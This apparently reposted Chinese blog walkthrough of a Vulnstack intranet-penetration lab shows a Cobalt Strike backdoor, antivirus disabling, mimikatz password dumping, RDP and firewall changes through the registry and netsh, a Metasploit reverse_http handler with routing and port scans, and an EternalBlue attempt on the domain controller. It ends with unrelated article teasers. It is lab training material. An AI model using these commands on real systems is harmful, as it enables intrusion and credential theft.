內網滲透學習-殺入內網

1、靶機上線cs

我們已經拿到了win7的shell,執行whoami,發現win7是administrator權限,且在域中

執行ipconfig發現了win7存在內網網段192.168.52.0/24

kali開啟cs服務端

客戶端啟動cs

先在cs中創建一個監聽器

接著用cs生成后門,記得把殺軟先關掉,不然后門生成就立馬被殺了

使用蟻劍把后門上傳到win7靶機的yxcms目錄下

蟻劍上執行后門

cs上線成功

2、內網信息收集

使用mimikatz抓取目標的用戶密碼,直接拿下

這里抓取到密碼之后,我們執行 net view 發現了域內另外倆臺機器點擊這里可以看到

(1)域內信息收集?

內網信息收集的主要目的就是查找域控以及域內的其他主機

?net view ? ? ? ? ? ? ? ? # 查看局域網內其他主機名
net config Workstation ? # 查看計算機名、全名、用戶名、系統版本、工作站、域、登錄域
net user ? ? ? ? ? ? ? ? # 查看本機用戶列表
net user /domain ? ? ? ? # 查看域用戶
net localgroup administrators # 查看本地管理員組(通常會有域用戶)
net view /domain ? ? ? ? # 查看有幾個域
net user 用戶名 /domain ? # 獲取指定域用戶的信息
net group /domain ? ? ? ?# 查看域里面的工作組,查看把用戶分了多少組(只能在域控上操作)
net group 組名 /domain ? ?# 查看域中某工作組
net group "domain admins" /domain ?# 查看域管理員的名字
net group "domain computers" /domain ?# 查看域中的其他主機名
net group "doamin controllers" /domain ?# 查看域控制器主機名(可能有多臺)

?查看計算機名、全名、用戶名、系統版本、工作站、域、登錄域

1、先判斷是否存在域,使用?ipconfig /all?查看 DNS 服務器,發現主 DNS 后綴不為空,存在域god.org

也可以執行命令net config workstation?來查看當前計算機名、全名、用戶名、系統版本、工作站、域、登錄域等全面的信息

2、上面發現 DNS 服務器名為 god.org,當前登錄域為 GOD 再執行net view /domain查看有幾個域(可能有多個)

3、查看域的組賬戶信息(工作組) net group /domain

4、既然只有一個域,那就利用 net group "domain controllers" /domain 命令查看域控制器主機名,直接確認域控主機的名稱為 OWA

5、確認域控主機的名稱為 OWA 再執行?net view?查看局域網內其他主機信息(主機名稱、IP地址)

掃描出來:

域控主機:OWA? ip:192.168.52.138

域成員主機:ROOT-TVI862UBEH? IP:192.168.52.141

? ? ? ? ? ? ? ? ? ? ? STU1? ?IP:192.168.52.143

接下來的目標就是橫向滲透拿下域控

(2)rdp遠程登錄win7

Win7跳板機 默認是不開啟3389的,同時還有防火墻

#注冊表開啟3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#添加防火墻規則

netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

#關閉防火墻

netsh firewall set opmode disable #winsows server 2003 之前

netsh advfirewall set allprofiles state off #winsows server 2003 之后

以域用戶GOD\Administrator登錄

?

輸入密碼

成功登錄

?3、內網滲透

(1)CS派生會話給MSF

1、msf開啟監聽

msfconsole # 啟動MSF框架
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.236.128
set lport 1111
exploit?

2.CS開啟外部監聽

新建一個監聽器,host為msf的ip,port與上面msf設置一致

?3、cs把控制的主機會話派生給msf

右鍵增加會話,選擇剛剛新建的外部監聽器

msf收到cs派生的shell?

4、msf簡單利用

獲得 MSF 的會話后即可使用 MSF 集成的諸多強大功能模塊和腳本。簡單演示下,如調用post/windows/gather/checkvm判斷靶機是否屬于虛擬機(檢查是否進入了蜜罐):

再如調用?post/windows/gather/enum_applications模塊枚舉列出安裝在靶機上的應用程序:

5、添加路由

# 可以用模塊自動添加路由
run post/multi/manage/autoroute
#添加一條路由
run autoroute -s 192.168.52.0/24
#查看路由添加情況
run autoroute -p

?

6、內網端口掃描

先執行background 命令將當前執行的 Meterpreter 會話切換到后臺(后續也可執行sessions -i 重新返回會話),然后使用 MSF 自帶 auxiliary/scanner/portscan/tcp 模塊掃描內網域控主機 192.168.52.138?開放的端口:

use auxiliary/scanner/portscan/tcp

set rhosts 192.168.52.138

set ports 80,135-139,445,3306,3389

run

?可以看到域控主機win2008? 192.168.52.138開啟了80,139,135,445端口

?

?(2)MSF進行ms17-010攻擊

1、msf掃描模塊探測是否存在ms17-010漏洞

對于開啟了 445 端口的 Windows 服務器肯定是要進行一波永恒之藍掃描嘗試的,借助 MSF 自帶的漏洞掃描模塊進行掃描:

search ms17_010
use 3
set rhosts 192.168.52.138
run

可能存在ms17-010漏洞?

2、漏洞利用

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp #內網環境,需要正向shell連接
set rhosts 192.168.52.138
run

好像沒有成功?

?

參考:Vulnstack 紅日安全內網靶場[一] - 1vxyz - 博客園 (cnblogs.com)

?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/41120.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/41120.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/41120.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Mysql 的第二次作業

一、數據庫 1、登陸數據庫 2、創建數據庫zoo 3、修改數據庫zoo字符集為gbk 4、選擇當前數據庫為zoo 5、查看創建數據庫zoo信息 6、刪除數據庫zoo 1)登陸數據庫。 打開命令行,輸入登陸用戶名和密碼。 mysql -uroot -p123456 ? 2)切換數據庫…

菜雞的原地踏步史(???)

leetcode啟動!(╯‵□′)╯︵┻━┻ 嘗試改掉想到哪寫哪的代碼壞習慣 鏈表 相交鏈表 public class Solution {/**ac(公共長度)b所以 鏈表A的長度 a c,鏈表B的長度b ca b c b c a只要指針a從headA開始走,走完再…

利用pg_rman進行備份與恢復操作

文章目錄 pg_rman簡介一、安裝配置pg_rman二、創建表與用戶三、備份與恢復 pg_rman簡介 pg_rman 是 PostgreSQL 的在線備份和恢復工具。類似oracle 的 rman pg_rman 項目的目標是提供一種與 pg_dump 一樣簡單的在線備份和 PITR 方法。此外,它還為每個數據庫集群維護…

抖音使矛,美團用盾

有市場,就有競爭。抖音全力進軍本地生活市場欲取代美團,已不是新聞。 互聯網行業進入存量時代,本地生活市場是為數不多存在較大增長空間的賽道。艾媒咨詢數據顯示,預計2025年在線餐飲外賣市場規模達到17469億元,生鮮電…

Day05-01-jenkins進階

Day05-01-jenkins進階 10. 案例07: 理解 案例06基于ans實現10.1 整體流程10.2 把shell改為Ansible劇本10.3 jk調用ansible全流程10.4 書寫劇本 11. Jenkins進階11.1 jenkins分布式1)概述2)案例08:拆分docker功能3)創建任務并綁定到…

安裝 ClamAV 并進行病毒掃描

安裝 ClamAV 并進行病毒掃描 以下是安裝 ClamAV 并使用它進行病毒掃描的步驟: 1. 安裝 ClamAV 在 Debian/Ubuntu 系統上: sudo apt update sudo apt install clamav clamav-daemon在 RHEL/CentOS 系統上: sudo yum install epel-release…

開發指南040-swagger加header

swagger可以在線生成接口文檔,便于前后端溝通,而且還可以在線調用接口,方便后臺調試。但是接口需要經過登錄校驗,部分接口還需要得到登錄token,使用token識別用戶身份進行后續操作。這種情況下,都需要接口增…

【刷題筆記(編程題)05】另類加法、走方格的方案數、井字棋、密碼強度等級

1. 另類加法 給定兩個int A和B。編寫一個函數返回AB的值,但不得使用或其他算數運算符。 測試樣例: 1,2 返回:3 示例 1 輸入 輸出 思路1: 二進制0101和1101的相加 0 1 0 1 1 1 0 1 其實就是 不帶進位的結果1000 和進位產生的1010相加 無進位加…

ssm校園志愿服務信息系統-計算機畢業設計源碼97697

摘 要 隨著社會的進步和信息技術的發展,越來越多的學校開始重視志愿服務工作,通過組織各種志愿服務活動,讓學生更好地了解社會、服務社會。然而,在實際操作中,志愿服務的組織和管理面臨著諸多問題,如志愿者…

dledger原理源碼分析系列(一)-架構,核心組件和rpc組件

簡介 dledger是openmessaging的一個組件, raft算法實現,用于分布式日志,本系列分析dledger如何實現raft概念,以及dledger在rocketmq的應用 本系列使用dledger v0.40 本文分析dledger的架構,核心組件;rpc組…

【pytorch16】MLP反向傳播

鏈式法則回顧 多輸出感知機的推導公式回顧 只與w相關的輸出節點和輸入節點有關 多層多輸入感知機 擴展為多層感知機的話,意味著還有一些層(理解為隱藏層σ函數),暫且設置為 x j x_{j} xj?層 對于 x j x_{j} xj?層如果把前面的…

迅捷PDF編輯器合并PDF

迅捷PDF編輯器是一款專業的PDF編輯軟件,不僅支持任意添加文本,而且可以任意編輯PDF原有內容,軟件上方的工具欄中還有豐富的PDF標注、編輯功能,包括高亮、刪除線、下劃線這些基礎的,還有規則或不規則框選、箭頭、便利貼…

【護眼小知識】護眼臺燈真的護眼嗎?防近視臺燈有效果嗎?

當前,近視問題在人群中愈發普遍,據2024年的統計數據顯示,我國兒童青少年的總體近視率已高達52.7%。并且近視背后潛藏著諸多眼部并發癥的風險,例如視網膜脫離、白內障以及開角型青光眼等,嚴重的情況甚至可能引發失明。為…

PMP--知識卡片--波士頓矩陣

文章目錄 記憶黑話概念作用圖示 記憶 一說到波士頓就聯想到波士頓龍蝦,所以波士頓矩陣跟動物有關,狗,牛。 黑話 你公司的現金牛業務,正在逐漸變成瘦狗,應盡快采取收割策略;問題業務的儲備太少&#xff0…

必須掌握的Linux的九大命令

ifconfig 命令用于配置和查看網絡接口的參數。 ping 命令用于測試主機之間的網絡連通性。 telnet用于通過Telnet協議連接到遠程主機。 telnet 127.0.0.1 8000 telnet example.com telnet example.com 8080 iostat 命令用于報告 CPU 統計信息和 I/O 設備負載。 iostat&…

護眼熱點:臺燈護眼是真的嗎?一起來看臺燈的功能作用有哪些

如今近視問題日益嚴峻,尤為引人矚目的是,高度近視學生群體占比已逼近10%的警戒線,且這一比例伴隨著學齡的增長而悄然攀升——從幼兒園6歲孩童中那令人憂慮的1.5%,到高中階段驚人的17.6%,每一組數據都敲響了保護兒童視力…

【Linux】靜態庫的制作和使用詳解

💐 🌸 🌷 🍀 🌹 🌻 🌺 🍁 🍃 🍂 🌿 🍄🍝 🍛 🍤 📃個人主頁 :阿然成長日記 …

代碼隨想錄算法訓練營第71天:路徑算法[1]

代碼隨想錄算法訓練營第71天:路徑算法 ? bellman_ford之單源有限最短路 卡碼網:96. 城市間貨物運輸 III(opens new window) 【題目描述】 某國為促進城市間經濟交流,決定對貨物運輸提供補貼。共有 n 個編號為 1 到 n 的城市&#xff0c…

【CT】LeetCode手撕—4. 尋找兩個正序數組的中位數

目錄 題目1- 思路2- 實現?4. 尋找兩個正序數組的中位數——題解思路 3- ACM 實現 題目 原題連接:4. 尋找兩個正序數組的中位數 1- 思路 思路 將尋找中位數 ——> 尋找兩個合并數組的第 K 大 (K代表中位數) 實現 ① 遍歷兩個數組 &am…

企業級監控系統Zabbix

文章目錄 Zabbix介紹Zabbix架構Zabbix serverZabbix agentZabbix proxy Zabbix Server的安裝Zabbix Agent的安裝監控主機流程zabbix_get自定義模板和監控項實戰用戶登錄數監控1.指定監控項命令2.重啟Agent服務3.在Server上創建監控項4.測試監控項5.查看監控項圖形 觸發器定義觸…